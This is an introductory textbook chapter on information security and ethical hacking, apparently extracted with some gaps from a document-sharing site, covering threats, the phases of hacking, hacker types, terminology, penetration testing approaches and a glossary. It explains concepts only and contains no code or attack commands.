Академический Документы
Профессиональный Документы
Культура Документы
Information Security
Information security (sometimes shortened to InfoSec) is the practice of protecting an
organization's data from unauthorized access, use, disclosure, disruption, modification, perusal,
inspection, recording or destruction. In short, it is the protection of the availability, privacy, and
integrity of company data and information. All of the information an organization stores, sends,
receives, and refers to must be protected against accidental or deliberate modification and must
be available in a timely fashion.
Employee social security, addresses, company confidential financial data, trade secrets, customer
data, intellectual property, the list is endless. Each of these examples refers to data that must be
protected. The protection of information is not new. What is new, however, is the importance of
protecting the information, and the consequences of not protecting it, or the consequences of
having the security of that information compromised. As more and more of this information is
stored and processed electronically and transmitted across networks or the internet, the risk of
unauthorized access increases and we are presented with growing challenges of how best to
protect our information.
Why protect data?
Would you leave your home for work without locking it? Possibly turning on an alarm for
additional protection? How about your car? When you park it at the mall, do you lock it? Is it
also armed by a security system? Why do you do this? To protect your assets.
Similarly, an organization must protect its asset. An asset is defined as anything of value,
including trademarks, patents, secret recipes, durable goods, data files, competent personnel,
clients, and so on. Every asset has data associated with it, which must be protected.
To fully understand why information security is important, an organization first needs to
understand both the value of information and the consequences of such information being
compromised.
When information is not adequately protected, it may be compromised and this is known as an
information or security breach. The consequences of information security breaches can be
severe. For businesses, a breach usually entails huge financial penalties, expensive law suits, loss
of reputation and business. Organizations must protect against unauthorized disclosure for a
variety of reasons, the most important being: (a) legal and (b) competitive reasons. If poor
security practices allow damage to your systems, you may be subject to criminal or civil legal
proceedings. Negligence to protect your data can comprise your systems, and if third parties are
impacted, there may be even more severe legal issues to deal with.
Security breaches can result in the theft, pilferage, and redistribution of intellectual property,
which in turn may lead to business loss. Botnets can be used to launch various types of Denialof-Service (DoS) and other web-based attacks, which may result in business downtime and
significant loss of revenues. Attackers may steal and sell corporate secrets to competitors,
compromise critical financial information, all of which are a compromise on an organization's
competitive advantage in the market.
Threats to information security
Many people mistakenly believe that the biggest threat to information security comes from
malicious attackers. However, it is far more likely that the biggest risks to information security
comes from less suspicious sources. For example, a threat can be something natural, such as a
flood or earthquake, or it could be accidental, such as a user inadvertently deleting a file,
disgruntled employees, or individuals that have accidentally been granted access to resources
they should not access to.
In order for an organization to protect itself from threats, they first need to understand what
threats they'll be facing in the coming year. With each passing day, these security threats are
becoming more serious and difficult to detect, it is vital for companies to understand what they
can do to best protect their systems and information.
Top challenges for information security
Worms, Viruses, Malware: Continues to be a top challenge, given the many methods to
install malware on systems, including client-side software vulnerabilities. Browsers
remain a top target for vulnerabilities. Vulnerability exploit is at the heart of hacking and
data breaches. These types often rely on vulnerability exploit to infect, particularly clientside and third party applications.
Malicious insiders/ex-employees: Threats are not always from the outside. Statistics show
that up to a fifth of damage comes from desperate and disgruntled employees attempt to
exploit the companies they currently or previously worked for.
Careless/untrained employees: It is estimated that almost half of all the damage caused to
information systems comes from authorized personnel who are either untrained or
incompetent, and will continue to be a threat unless companies take action. Policies,
procedures, training and a little technology can make a world of difference in reducing an
organization's risk to careless insiders.
Infrastructure: Don't discount physical factors such as fire, water, and bad power. They
are a significant threat to information security.
Mobile devices: Mobile devices have become a plague for information security
professionals. There are worms and other malware that specifically target these devices
such as the iPhone worm that would steal banking data and enlist these devices in a
botnet. Thef of laptops is another major issue. Tens of thousands of laptops are stolen
each year and often these have sensitive data that require public disclosure as a data
breach.
Social networking: Social networking sites have a certain element of trust to them which
makes them a breeding ground for a variety of spurious activities such as spam, scams,
scareware and a host of other attacks and these threats will continue to rise. Identity theft
would be a big factor from an information security perspective,
Social engineering: Social engineering is always a popular tool used by cyber criminals
and phishing is still a popular method for doing just that.
Zero day exploits: A zero-day (or zero-hour or day zero) attack or threat is an attack that
exploits a previously unknown vulnerability in a computer application, meaning that the
attack occurs on "day zero" of awareness of the vulnerability. Zero day exploits can be
engineered to take advantage of these file type exploits to compromise attacked systems
or steal confidential data such as banking passwords and personal identity information.
Cyber espionage: Most of these incidents surround government bodies and agencies and
therefore have not been a huge threat to most individual organizations.
Cloud computing: The public nature of data sharing in the cloud and the loss of control
over their data for organizations is a big risk for security. Balancing data sharing with
privacy requirements is a tight rope act.
Confidentiality: It is required to assure that only authorized users can access the
information. Confidentiality breaches may take place because of improper data handling
or a hacking attempt.
Availability: It assures that the systems used for delivering, storing, and processing
information are accessible when needed by the authorized users.
Functionality
Usability
Security
The triangle is used as an increase or decrease in any one of the factors will have an impact on
the presence of the other two. When the security is increased, the ball in the triangle moves away
from the functionalities and ease of use parameters.
Ethical hacking
Ethical hacking is a process by which penetration testing of networks and/or computer systems is
performed by an individual, called an Ethical Hacker. The Ethical Hacker is a person who is
trusted by the organization and uses the same methods and techniques as a Hacker. However,
malicious hacking, often referred as hacking, is a term in which a black hat hacker, sometimes
called a cracker, breaks the computer security without authorization or uses technology (usually a
computer, phone system or network) for malicious reasons, such as vandalism, credit card fraud,
identity theft, piracy, or other types of illegal activity.
Necessity of ethical hacking
Vulnerability testing and security audits only cannot ensure that a network is secure. In order to
ensure the security of networks, a "defense in depth" strategy is required to be implemented by
penetrating into the networks to estimate vulnerabilities and expose them.
Defense in depth is a security strategy in which several protection layers are placed throughout
an information system. It is useful in preventing direct attacks against an information system and
data as break in one layer directs the attacker to the next layer.
Ethical hacking is necessary, since it permits the countering of attacks from malicious hackers by
anticipating methods that can be used to break into a system.
Stages of ethical hacking
There are five stages to ethical hacking:
1. Reconnaissance: In this phase, the attacker collects information regarding the victim.
The following are the types of reconnaissance:
o Passive: It involves gaining information without directly interacting with the
target. For example, searching public records or news releases.
o Active: It involves interacting with the target directly by any means. For example,
telephone calls to the help desk or technical department.
2. Scanning: In this phase, the attacker begins to probe the target for vulnerabilities that can
be exploited. It can include use of dialers, port scanners, network mapping, sweeping,
vulnerability scanners, etc. Attackers extract information, such as computer names, IP
address, and user accounts to launch attack.
3. Gaining Access: In this phase, the attacker exploits a vulnerability to gain access into the
system.
4. Maintaining Access: In this phase, the attacker maintains access to fulfill his purpose of
entering into the network.
5. Covering Tracks: In this phase, the attacker attempts to cover his tracks so that he
cannot be detected or penalized under criminal law.
An ethical hacker should have an excellent knowledge of computers and their functioning,
including programming and networking. Since organizations have a variety of operating systems,
such as UNIX, Linux, Windows, and Macintosh, an ethical hacker must be an expert in dealing
with these operating systems. Ethical hackers should also be familiar with a number of hardware
platforms. They should be knowledgeable about security areas and related issues as well.
Conduct security evaluation: In this phase, the evaluation technical report is prepared
based on testing potential vulnerabilities.
Conclusion: In this phase, the results of the evaluation are communicated to the
organization and corrective action is taken if needed.
Black hat hackers (crackers): They are computer specialists. They perform malicious
attacks on information systems by using their hacking skills.
Gray hat hackers: They sometimes do not break laws and try to defend a network. They
sometimes act as black hat hackers.
White hat hackers (ethical hackers): They have excellent computer skills and secure
information systems by using their knowledge.
Understand vulnerability research and list the various vulnerability research tools.
Hacking terminology
Before we dive into the discussion on types and implications of hacker attacks, let's familiarize
ourselves over common hacking terminologies.
Brute force: In a brute force attack, an attacker uses software that tries a large number of
key combinations in order to get a password. In order to prevent such attacks, users
should create passwords that are more difficult to guess, e.g., using a minimum of six
characters, alphanumeric combinations, and lower-upper case combinations, etc.
DoS attack: A Denial of Service (DoS) attack is mounted with the objective of causing a
negative impact on the performance of a computer or network. It is also known as a
network saturation attack or bandwidth consumption attack.
Logic bomb: A logic bomb is a malicious program that executes when a predetermined
event occurs. For example, a logic bomb can execute when a user logs on to a computer
or presses certain keys on the keyboard. It can also execute on a particular date or at a
time specified by the developers.
Port Redirection: It is the process of redirecting network traffic from one IP address /
port to another IP address / port.
Spoofing: Spoofing is a technique that makes a transmission appear to have come from
an authentic source by forging the IP address, email address, caller ID, etc.
Trojan: A Trojan horse is a malicious software program code that masquerades itself as a
normal program. When a Trojan horse program is run, its hidden code runs to destroy or
scramble data on the hard disk.
Virus: A virus is an executable file that infects documents, has replacing ability, and
avoids detection. Viruses are designed to corrupt or delete data files from the hard disk.
Operating system attacks: In these attacks, the attacker looks for OS related
vulnerabilities and uses those vulnerabilities to gain access to the network. Some of the
OS vulnerabilities are as follows:
o Buffer overflow vulnerabilities
o Bugs in operating system
o Unpatched operating system
Application-level attacks: There are often many software which have poor error
checking. Poor or nonexistent error checking in applications lead to the following:
o Buffer overflow attacks
o Active content
o Cross-site scripting
o Denial of service and SYN attacks
Shrink wrap code attack: When a user installs an OS/application, it comes with many
sample scripts for administrative tasks. Often, these scripts are not customized, which
leads to default code or shrink wrap code attacks.
Vulnerability research
Vulnerability research is the process used to discover vulnerabilities and design flaws that may
lead to an attack on or misuse of an operating system and its applications. Vulnerabilities are
classified depending on severity level (low, medium, or high) and exploit range (local or remote).
An administrator needs vulnerability research for the following purposes:
Find weaknesses, and alert the network administrator before a network attack.
CodeRed Center
SecurityTracker
HackerWatch
Symantec
SecurityFocus
TechNet
Security Magazine
SC Magazine
Computerworld
CNET Blogs
Techworld
Security Watch
HackerJournals
CodeRed Center: It is a comprehensive security that security administrators can use for
daily, accurate, up-to-date information on the latest viruses, Trojans, malware, threats,
security tools, risks, and vulnerabilities.
This analysis is performed from the position of a potential attacker, and can include active
exploitation of security vulnerabilities. The security issues together with an assessment of their
impact and often with a proposal for mitigation or a technical solution will be presented to the
system owner. The intent of a penetration test is to determine feasibility of an attack and the
amount of business impact of a successful exploit, if discovered. It is a component of a full
security audit.
Need for penetration testing
Attackers are always looking for opportunities to penetrate systems. They employ any number of
automated tools and network attacks looking for holes in your system. Most hackers use well
known attacks and exploits, which are entirely preventable. Penetration testing provides IT
management with a view of their network from a malicious point of view. The goal is that the
penetration tester will find ways into the network so that they can be fixed before someone with
less than honorable intentions discovers the same holes.
Penetration testing:
Helps an organization adopt best practices to conform to legal and industry regulations
Evaluates the efficiency of network security devices, such as firewalls, routers, and web
servers.
Blackbox testing is a technique in which the testing team has no knowledge about the
infrastructure of the organization. This type of testing is also known as external testing.
The testers or auditors (black-hats) must first determine the location and extent of the
systems before commencing their analysis. This testing technique can be expensive and
time consuming.
In this approach, the tester will be assessing the network infrastructure from a remote
location and will not be aware of any internal technologies deployed by the concerning
organization. The tester will employ a number of real world hacker techniques and
following through organized test phases, it may reveal some known and unknown set of
vulnerabilities which may otherwise exist on the network.
Graybox testing is a combination of whitebox testing and blackbox testing. This hybrid
approach, provides a powerful insight for internal and external security viewpoints. It
does require an auditor with limited knowledge of an internal system to choose the best
way to assess its overall security. The tester or auditor (also known as a gray-hat) is
equipped with the knowledge of system and designs test cases or test data based on
system knowledge. The gray-hat typically performs testing to find vulnerabilities in
software and network systems.
Chapter Summary
In this chapter, we learned about elements of information security, top security challenges,
various hacking terminologies and the fundamentals of ethical hacking. We also learned about
the skills required of an ethical hacker, hacktivism, phases of malicious hacking, and types of
hacking attacks. Lastly, we discussed penetration testing and its associated methodologies.
Glossary
Attack
An attack is an action against an information system or network that attempts to violate the
system's security policy.
Authentication
Authentication is the act of establishing or confirming something (or someone) as authentic, i.e.,
claims made by or about the subject are true ("authentification" is a French language variant of
this word).
Authenticity
Authenticity is considered as the characteristic of a communication, document, or any data that
ensures the genuine quality or the quality is not corrupted from the original.
Cracker
A computer expert performing malicious actions
Ethical Hacker
A computer expert securing information
Hacker
A hacker is an intelligent individual having excellent computer skills. The hacker has the ability
to create and explore into the computer's software and hardware.
Hacktivism
Hacktivism is the act of hacking or breaking into a computer system for a politically or socially
motivated purpose.
Non-repudiation
Non-repudiation ensures that a party to a contract or a communication cannot refuse the
authenticity of their signature on a document or the sending of a message that they generated.
Penetration test
A penetration test is a method of evaluating the security of a computer system or network by
simulating an attack from a malicious source, known as a Black Hat Hacker, or Cracker.
Phreaker
A person who breaks a communication system
Script kiddie
A script kiddie is an individual who uses hacking programs developed by others to attack
information systems and spoil Web sites.
Threat
A threat is an indication of a potential undesirable event.
Vulnerability research
Vulnerability research is the process used to discover vulnerabilities and design flaws that will
open an operating system and its applications to attack or misuse.